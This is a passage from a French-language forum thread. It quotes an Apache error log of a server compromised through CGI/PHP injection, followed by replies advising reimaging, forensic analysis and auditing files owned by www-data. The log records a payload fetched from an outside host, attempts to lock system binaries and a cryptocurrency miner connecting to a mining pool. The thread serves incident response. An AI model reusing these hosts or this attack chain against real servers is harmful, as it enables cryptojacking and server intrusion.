2013] [error] [client 50.116.50.35] 350K .......... .......... 100% 11.3M=0.9s [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:31 (425 KB/s) -clamav’ saved [379680/379680]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] --2013-11-22 00:44:31-- europay24.info/sh
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Resolving europay24.info… 85.17.180.61
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Connecting to europay24.info|85.17.180.61|:80… connected.
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] HTTP request sent, awaiting response… 200 OK
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Length: 518288 (506K) [text/plain]
[Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] Saving to: sh' [Fri Nov 22 00:44:31 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 0K .......... .......... .......... .......... .......... 9% 48.1K 9s [Fri Nov 22 00:44:32 2013] [error] [client 50.116.50.35] 50K .......... .......... .......... .......... .......... 19% 933K 4s [Fri Nov 22 00:44:33 2013] [error] [client 50.116.50.35] 100K .......... .......... .......... .......... .......... 29% 64.1K 4s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 150K .......... .......... .......... .......... .......... 39% 125K 3s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 200K .......... .......... .......... .......... .......... 49% 385K 2s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 250K .......... .......... .......... .......... .......... 59% 177K 2s [Fri Nov 22 00:44:34 2013] [error] [client 50.116.50.35] 300K .......... .......... .......... .......... .......... 69% 182K 1s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 350K .......... .......... .......... .......... .......... 79% 180K 1s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 400K .......... .......... .......... .......... .......... 88% 101K 0s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 450K .......... .......... .......... .......... .......... 98% 846K 0s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 500K ...... 100% 1.14M=3.8s [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] 2013-11-22 00:44:35 (133 KB/s) -sh’ saved [518288/518288]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill: 22: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]… or
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] kill -l [exitstatus]
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Starting Stratum on stratum+tcp://216.230.103.42:3333
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] 4 miner threads started, using ‘scrypt’ algorithm.
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 3 to cpu 3
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 0 to cpu 0
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 1: \x7fELF\x02\x01\x01\x02: not found
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] ./sh: 2: Syntax error: “(” unexpected
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 2 to cpu 2
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on bash\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] chattr: Operation not permitted while setting flags on sh\r
[Fri Nov 22 00:44:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:35] Binding thread 1 to cpu 1
[Fri Nov 22 00:44:37 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:37] Stratum detected new block
[Fri Nov 22 00:44:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:38] thread 3: 4096 hashes, 3.75 khash/s
[Fri Nov 22 00:44:39 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:39] thread 0: 4096 hashes, 3.19 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 2: 4096 hashes, 3.31 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 1: 4096 hashes, 1.46 khash/s
[Fri Nov 22 00:45:26 2013] [error] [client 50.116.50.35] [2013-11-22 00:45:26] thread 1: 87412 hashes, 1.92 khash/s
[Fri Nov 22 00:46:22 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:22] thread 1: 115424 hashes, 2.04 khash/s
[Fri Nov 22 00:46:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:24] thread 0: 191392 hashes, 1.82 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 2: 198628 hashes, 1.74 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 3: 224940 hashes, 1.94 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 1: 122500 hashes, 2.02 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 0: 109444 hashes, 1.83 khash/s
[Fri Nov 22 00:47:32 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:32] thread 3: 116544 hashes, 2.01 khash/s
[Fri Nov 22 00:47:36 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:36] thread 2: 104572 hashes, 1.67 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 1: 121104 hashes, 1.99 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 0: 109620 hashes, 1.81 khash/s
[Fri Nov 22 00:48:31 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:31] thread 3: 120544 hashes, 2.06 khash/s
[Fri Nov 22 00:48:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:38] thread 2: 100212 hashes, 1.61 khash/s
[Fri Nov 22 00:48:51 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php5
[Fri Nov 22 00:49:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:20] thread 1: 119460 hashes, 2.13 khash/s
[Fri Nov 22 00:49:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:23] thread 0: 108540 hashes, 1.84 khash/s
[Fri Nov 22 00:49:26 2013] [warn] [client 50.116.50.35] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Fri Nov 22 00:49:26 2013] [error] [client 50.116.50.35] Script timed out before returning headers: php
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 3: 123396 hashes, 1.93 khash/s
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 2: 96888 hashes, 1.71 khash/s
[Fri Nov 22 00:50:19 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:19] thread 1: 127748 hashes, 2.16 khash/s
[Fri Nov 22 00:50:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:20] thread 0: 110688 hashes, 1.94 khash/s
[Fri Nov 22 00:50:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:38] thread 3: 115972 hashes, 1.83 khash/s
[Fri Nov 22 00:50:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:40] thread 2: 102696 hashes, 1.59 khash/s
[Fri Nov 22 00:50:45 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:45] Stratum detected new block

[Fri Nov 22 01:21:11 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:11] thread 1: 118740 hashes, 2.16 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 0: 111680 hashes, 1.67 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 3: 119164 hashes, 1.95 khash/s
[Fri Nov 22 01:21:23 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:23] thread 2: 104004 hashes, 1.76 khash/s
[/quote]

Pour compléter les réponses de mes camarades, le plus simple est de faire une image disque de ton serveur, et de tout réinstaller, bien à jour, et de bien sécuriser avant de remettre en prod (tu as des sauvegardes de données n’est il pas ?)

Ensuite, tu te sers de l’image réalisée, en machine virtuelle bien isolée, pour analyser post mortem ce qui c’est passé.

Ben visiblement, il a pu charger et exécuter un serveur, mais il n’a pas réussi à avoir les droits root apparemment. Tu peux donc rechercher tous les fichiers appartenant à www-data et les controler.
L’attaque est une injection cgi.Voir
security.stackexchange.com/quest … hp-attacks
pzr exemple

Le truc à faire, surtout, c’est débuggé ton site web troué

L’injection cgi est surtout un mauvais paramétrage du serveur lui même je crois